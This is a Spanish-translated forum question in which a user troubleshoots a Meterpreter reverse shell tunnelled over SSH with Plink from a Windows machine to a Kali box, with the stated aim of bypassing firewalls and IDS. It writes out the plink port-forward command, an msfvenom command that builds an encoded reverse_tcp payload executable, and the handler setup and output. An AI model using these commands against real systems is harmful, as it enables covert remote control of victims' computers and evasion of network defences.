Problema de tunelización SSH con Plink

0

así que estoy tratando de seguir este tutorial para omitir los firewalls y los IDS enrutan el tráfico a través de una tubería SSH y reciben una shell invertida Meterpreter (reverse_tcp) desde una computadora con Windows a través de Internet. Sin embargo, este tutorial está bastante desactualizado, por lo que parece que he encontrado un obstáculo.

Aquí es donde estoy ahora:

plink -L 6666:mypublicattackerip:6666 mypublicattackerip -l sshuser -pw hssuser1

Esta es mi salida del siguiente comando ejecutado en un indicador de comando: ("Almacenar clave en caché" no se muestra porque lo he ejecutado antes)

Using username "sshuser".

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr  6 10:33:46 2018 from .. snip ..
]0;sshuser@kali: ~[01;31msshuser@kali[00m:[01;34m~[00m$

Obtengo un shell interactivo (pero también deformado) de mi caja Kali que no aparece en el tutorial, pero el netstat -anop tcp | findstr 6666 parece idéntico al que se muestra en el tutorial, así que continúo.

TCP    127.0.0.1:6666         0.0.0.0:0              LISTENING       12828

Así que configuré un Meterpreter multi/handler para windows/meterpreter/reverse_tcp con el LHOST establecido en la dirección IP pública de mi atacante, el LPORT establecido en 6666 y escribí exploit .

Luego ejecuté el shell inverso de Meterpreter generado con la misma línea de comando utilizada en el tutorial

msfvenom -p windows/meterpreter/reverse_tcp -a x86 LHOST=127.0.0.1 LPORT=6666 --encoder x86/shikata_ga_nai -b'\x00' --format exe > reverse_tcpPlink6666Encoded.exe

con Plink conectado al igual que mi manejador escuchando y he aquí que no obtengo ninguna conexión con mi caja Kali.

msf exploit(multi/handler) > exploit

[-] Handler failed to bind to mypublicattackerip:6666:-  -
[*] Started reverse TCP handler on 0.0.0.0:6666 
.. no sessions ..

Sin embargo, puedo ver en Process Explorer que:

A. El proceso reverse_tcpPlink6666Encoded.exe es y sigue vivo y eso

B. Si voy a la pestaña TCP / IP para ese proceso, confirma que ha establecido correctamente una conexión con algo:

y eso es todo.

Esto es lo que netstat tiene que decir sobre todo esto:

  TCP    127.0.0.1:6666         0.0.0.0:0              LISTENING       17820
  TCP    127.0.0.1:6666         127.0.0.1:55223        ESTABLISHED     17820
  TCP    127.0.0.1:55223        127.0.0.1:6666         ESTABLISHED     14568

Para resumir, no estoy seguro de por qué no obtengo una conexión de shell inversa con mi nodo Kali después de todo esto.

Gracias como siempre.

    
pregunta 0xHex 06.04.2018 - 18:03
fuente

0 respuestas

Lea otras preguntas en las etiquetas